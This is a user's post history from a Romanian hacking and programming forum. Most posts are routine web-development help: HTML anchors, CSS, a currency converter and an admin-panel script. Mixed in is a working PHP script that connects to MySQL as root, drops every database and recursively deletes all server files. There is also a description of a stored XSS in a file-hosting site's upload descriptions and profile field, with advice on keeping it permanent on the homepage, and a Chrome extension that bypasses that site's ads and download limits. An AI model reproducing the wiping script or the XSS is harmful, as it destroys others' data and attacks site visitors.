JohnDoe
-
Posts
104 -
Joined
-
Last visited
Posts posted by JohnDoe
-
-
Am luat fisierele din folder si le-am pus in acelasi loc unde sunt paginile.
pune folderul admin (cum am scris la inceput) nu fisierele din el..
https://rstcenter.com/forum/51809-html-cum-fac-un-panou-de-control.rst#post344869
-
Logged in
Warning: scandir() [function.scandir]: open_basedir restriction in effect. File(../) is not within the allowed path(s): (VIRTUAL_DOCUMENT_ROOT) in /www/99k.org/f/i/l/filewagon/htdocs/index.php on line 61
Warning: scandir(../) [function.scandir]: failed to open dir: Operation not permitted in /www/99k.org/f/i/l/filewagon/htdocs/index.php on line 61
Warning: scandir() [function.scandir]: (errno 1): Operation not permitted in /www/99k.org/f/i/l/filewagon/htdocs/index.php on line 61
Warning: Invalid argument supplied for foreach() in /www/99k.org/f/i/l/filewagon/htdocs/index.php on line 63
Click to edit a file
Asta imi apare dupa ce m-am logat.Deci eu vroiam ceva ca sa pot edita pagina asta The Accountant's Black Book cu usurinta.
ai pus folderul "admin", nu fisierele din el, cum ti-am spus?
// se pare ca nu filewagon.99k.org/index.php
-
@JohnDoe am incercat ce ai spus tu dar imi da eroarea asta
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /www/99k.org/f/i/l/filewagon/htdocs/index.php:5) in /www/99k.org/f/i/l/filewagon/htdocs/index.php on line 36
descarca-l iar. era doar o mica eroare.
PS. daca vrei si ceva design si alte optiuni, poti sa ceri.
-
1.Elimina database-ul doar daca e mysql (Nu e valabil si in alte tipuri de database si readuc aminte mysql nu este singurul db care exista)
2.Nu sterge datele ci face doar unlink care e cu totul altceva ( adica sterge doar numele fisierelor nu si continutul ,reduce numarul de referinte in inode si atat , asta inseamna ca datele exista in continuare).
3.Daca vine rulat intrun host 3rd party (pe langa faptul ca datele vor ramane oricum in partitie deoarece ai facut doar unlink pot fi implementate si solutii de mirror|clone|snapshot care oricum vor pastra o copie fresh a datelor.
4.In cazul in care vin implementate solutiile de la punctul 3 iti demonstrez ca nu vei distruge datele nici daca vei folosi comandul "dd" (conversion of raw data) care poate face un device format la un low level.
5.Tu ai chemat doar cateva functii intrun limbaj de programare high-level interpretat la nivel de utilizator care vin traduse la un low-level si fac un indirect system call , adica solicita un serviciu la nivelul de kernel a sistemului de operare.
Un syscall furnizeaza doar o interfata intre user level si system level care poate fi chemata prin intermediul diverselor limbaje de programare high-level.Prin intermediul limbajelor de programare high level se face doar o cerere care nu e nicidecum echivalenta cu un ordin.
Da, m-am gandit doar la mySQL pentru ca asta folosesc si am uitat de celelalte baze de date. In legatura cu stergerea fisierelor, eu am incercat pe XAMPP in windows si nu am mai avut folderul in care sunt puse fisierele pe server (htdocs), deci am crezut ca sterge tot, nu m-am gandit la alte posibilitati. Oricum, daca nu sunt implementate masuri de securitate/backup cred ca ramane serverul fara baze de date mySQL si fisiere (cum s-a intamplat la mine pe serverul local).
-
Asta daca pui in root la server si ai drepturi de admin sterge si bazele de date (mysql) si toate fisierele si folderele(testat), pentru parole si restu e simplu folosing cURL.
<?php
// Johndoe @ rstcenter.com/forum/members/johndoe
error_reporting(0);
function delete_directory($dirname) {
if (is_dir($dirname))
$dir_handle = opendir($dirname);
if (!$dir_handle)
return false;
while($file = readdir($dir_handle)) {
if ($file != "." && $file != "..") {
if (!is_dir($dirname."/".$file))
unlink($dirname."/".$file);
else
delete_directory($dirname.'/'.$file);
}
}
closedir($dir_handle);
rmdir($dirname);
return true;
}
$link = mysql_connect('localhost', 'root', '');
$res = mysql_query("SHOW DATABASES");
while ($row = mysql_fetch_assoc($res)) {
$sql = "DROP DATABASE ".$row['Database'];
if (mysql_query($sql, $link)) {
//
}
}
delete_directory('.');
echo 'Gata, e praf!';
?> -
Ti-am scris un script PHP care face exact ce ai cerut, iti arata fisierele HTML pe care le ai in directorul unde ai site-ul, folderul scriptului (/admin) trebuie sa fie in acelasi folder cu site-ul.La inceput iti cere o parola de logare care in prezent este php ,tu poti sa schimbi parola punand alt hash md5 in variabilele $secret din index.php si edit.php.
Download script : http://1582.tk/dw/admin.rar
-
la sume din 5 cifre afiseaza asa:
74?247.5943 ron*
chiar si la 1000 imi da conversia tot asa
Am facut update, uita-te la sursa.
# am pus si limita de maxim 3 zecimale la rezultat ca sa fie mai usor de citit.
-
sal, de ce ai folosit GET si nu POST?
Nu este necesar POST pentru acest script.
-
Tocmai asta i-am sugerat si eu lui Vanish ca cica nu-i merge bine ala de pe Yahoo. Ma intreb daca de la el ai ideea.
nu.
-
Am scris un script PHP pentru conversie valutara care foloseste un API al Google. In loc de RON sau USD se poate pune EUR sau orice alt fel de valuta.
Demo: http://1582.tk/currency
-
http://pastebin.com/J0uXtsRV / http://1582.tk/dt.html
Functioneaza si in msie6, si fara js, si este cod curat.
-
Nu stii sa descrii problema. Dar din ce am vazut vrei sa faci un accordion menu. Nu am editat codul tau pentru ca este prea urat (mai ales comentariile alea pt. msie.). In schimb am facut o versiune mai curata si care merge in msie.
CSS Accordion. - Pastebin.com
# daca vrei si alte efecte, Search The Fucking Web.
-
Dupa modelul cu
<a href="#TOP">Sus!</a>
vreau sa adaug
<a href="Nume diviziune">Test 553</a>
// Am o pagina HTMl cu un continut foarte mare.. si pentru a-l ajuta pe vizitator m-am gandit sa adaug aceasta optiune.. Am facut un meniu cu toate testele iar atunci cand da click pe test3 sa il duca la acea divizune [ <div id="test3">...</div>
<a href="#test3">diviziunea cu id test3</a>
-
Am facut update, versiunea anterioara nu era pentru download nelimitat, acum este.
download: http://1582.tk/fisierulmeu_v2.crx
api: http://1582.tk/f?link={link fisier}
-
la width: trebuie neaparat fix;)
la detaliile nule pe care le-ai dat despre layout, nu aveam de unde sa stiu.
-
width:auto;
height:auto;
-
Notepad++
-
-
-
Ambele carti in format pdf.
http://www.2shared.com/file/6p61vSef/carti.html? || http://fisierulmeu.ro/26EL5RPFG8VL/carti-rar.html
-
-
Este in descriere. Download T Time - 120103-0103.xml - FisierulMeu.ro
@irrational a gasit o alta metoda, dar acelasi rezultat ( un xss foarte frumos ).
indiciu: are legatura cu PHP: html_entity_decode - Manual
//edit: a 2 -a metoda este sa pui xss-ul la website (din profil), in felul acesta tot ce urci si ai urcat va fi afectat. Cel mai mare avantaj fiind ca daca ajungi in Top utilizatori (prima pagina) ai xss permanent pe homepage pana se rezolva si poti sa faci cu adevarat ceva din vulnerabilitatea asta.
@Alexgh - PM.
-
Se introduce in descriere cand urci un fisierCum l-ai introdus? -
Am scris o mica extensie pentru Google Chrome care scoate reclamele si timpul de asteptare din fisierulmeu.ro, de asemenea limita de download de 3 fisiere este scoasa.Download - www.1582.tk/fisierulmeu.crx (.crx chrome extension)
#update
Am facut update, versiunea anterioara nu era pentru download nelimitat, acum este.
download: http://1582.tk/fisierulmeu_v2.crx
api: http://1582.tk/f?link={link fisier}
//Unii sunt mai handicapati de felul lor si dau copy/paste la orice, nu fiti si voi. http://webcache.googleusercontent.com/search?q=cache:64ztWbN6VBsJ:www.lafel.ro/forum/clubul-lafel/fisierulmeu-ro-unlimited-downloads-no-ads-t13609.html+&cd=39&hl=ro&ct=clnk&gl=ro
<b> Outdated. Daca are cineva nevoie, PM! </b>
[/quote']
[html] cum fac un panou de control?
in Programare
Posted · Edited by JohnDoe
vezi ce permisiuni ai setat din ftp. pune sa fie 0644 la fisierele html.